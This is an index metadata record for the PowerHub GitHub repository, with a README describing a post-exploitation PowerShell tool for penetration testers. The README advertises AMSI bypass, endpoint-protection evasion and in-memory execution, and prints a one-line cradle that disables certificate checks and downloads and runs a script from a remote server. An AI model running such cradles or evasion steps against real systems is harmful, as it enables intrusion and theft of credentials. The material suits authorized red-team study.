{"id":13454411,"url":"https://github.com/AdrianVollmer/PowerHub","last_synced_at":"2025-03-24T05:33:44.182Z","repository":{"id":34262243,"uuid":"142741112","full_name":"AdrianVollmer/PowerHub","owner":"AdrianVollmer","description":"A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting","archived":false,"fork":false,"pushed_at":"2024-12-19T09:42:14.000Z","size":7532,"stargazers_count":790,"open_issues_count":0,"forks_count":126,"subscribers_count":18,"default_branch":"master","last_synced_at":"2025-03-21T21:02:43.596Z","etag":null,"topics":["pentest","post-exploitation","powershell","python","remote-admin-tool"],"latest_commit_sha":null,"homepage":"https://adrianvollmer.github.io/PowerHub/","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/AdrianVollmer.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-07-29T07:45:05.000Z","updated_at":"2025-03-10T10:11:47.000Z","dependencies_parsed_at":"2023-02-16T21:00:34.467Z","dependency_job_id":"49fdf240-5a59-43d4-bb81-be9785bba81a","html_url":"https://github.com/AdrianVollmer/PowerHub","commit_stats":{"total_commits":996,"total_committers":6,"mean_commits":166.0,"dds":0.09236947791164662,"last_synced_commit":"404f0f231c946c9c67fc0bc004669c47594d14b7"},"previous_names":[],"tags_count":33,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AdrianVollmer%2FPowerHub","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AdrianVollmer%2FPowerHub/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AdrianVollmer%2FPowerHub/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AdrianVollmer%2FPowerHub/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/AdrianVollmer","download_url":"https://codeload.github.com/AdrianVollmer/PowerHub/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245217427,"owners_count":20579291,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["pentest","post-exploitation","powershell","python","remote-admin-tool"],"created_at":"2024-07-31T08:00:53.831Z","updated_at":"2025-03-24T05:33:44.160Z","avatar_url":"https://github.com/AdrianVollmer.png","language":"PowerShell","funding_links":[],"categories":["Red Team","Tools"],"sub_categories":["Post Exploitation","Open Source"],"readme":"PowerHub\n========\n\nPowerHub is a convenient post exploitation tool for PowerShell which aids a\npentester in transferring data, in particular code which may get flagged by\nendpoint protection. Features:\n\n* Fileless\n* Stateless\n* Cert pinning\n* String \"obfuscation\" by RC4 encryption\n* Choose your AMSI Bypass\n* Transparent aliases for in-memory execution of C# programs\n\n![PowerHub Webapp](docs/img/powerhub-webapp.png)\n![PowerHub Webapp](docs/img/powerhub-sharphound.png)\n\nDuring an engagement where you have a test client available, one of the\nfirst things you want to do is run SharpHound, Seatbelt, PowerUp,\nInvoke-PrivescCheck or PowerSploit. So you need to download the files,\nmess with endpoint protection, disable the execution policy, etc.\nPowerHub provides an (almost) one-click-solution for this. Oh, and you can\nalso run arbitrary binaries (PE and shell code) entirely in-memory using\nPowerSploit's modules, which is sometimes useful to bypass application\nwhitelisting.\n\nYour loot (Kerberos tickets, passwords, etc.) can be easily transferred back\neither as a file or a text snippet, via the command line or the web\ninterface. PowerHub also helps with collaboration in case you're a small\nteam.\n\nHere is a simple example (grab information about local groups with PowerView\nand transfer it back):\n\n```ps1con\nPS C:\\Users\\avollmer\u003e [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Nxois='bZeVBC4vZfakT5SmCcaFam6IRY6UNLnC';$Plukgmio=New-Object Net.WebClient;IEX $Plukgmio.DownloadString('https://192.168.11.2:8443/')\n  _____   _____  _  _  _ _______  ______ _     _ _     _ ______\n |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]\n |       |_____| |__|__| |______ |    \\_ |     | |_____| |_____]\n2.0.0                       written by Adrian Vollmer, 2018-2024\nRun 'Help-PowerHub' for help\nPS C:\\Users\\avollmer\u003e Get-HubModule PowerView\n\nName   : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1\nType   : ps1\nN      : 205\nLoaded : True\nAlias  :\n\nPS C:\\Users\\avollmer\u003e Get-LocalGroup | PushTo-Hub -Name groups.json\n```\n\nDocumentation\n=============\n\nRead the docs [here](https://adrianvollmer.github.io/PowerHub/).\n\n* **Installation:** \u003chttps://adrianvollmer.github.io/PowerHub/latest/installation.html\u003e\n* **Usage:** \u003chttps://adrianvollmer.github.io/PowerHub/latest/usage.html\u003e\n* **Contributing:** \u003chttps://adrianvollmer.github.io/PowerHub/latest/contrib.html\u003e\n* **Changelog:** \u003chttps://adrianvollmer.github.io/PowerHub/latest/changelog.html\u003e\n\n\nCredits\n=======\n\nPowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10,\np3nt4. And of course, it would be nothing without @harmj0y,\n@mattifestation and the many other contributors to\n[PowerSploit](https://github.com/PowerShellMafia/PowerSploit).\n\nThanks!\n\nAuthor and License\n==================\n\nAdrian Vollmer, 2018-2024. MIT License.\n\nDisclaimer\n==========\n\nUse at your own risk. Do not use without full consent of everyone involved.\nFor educational purposes only.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAdrianVollmer%2FPowerHub","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FAdrianVollmer%2FPowerHub","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAdrianVollmer%2FPowerHub/lists"}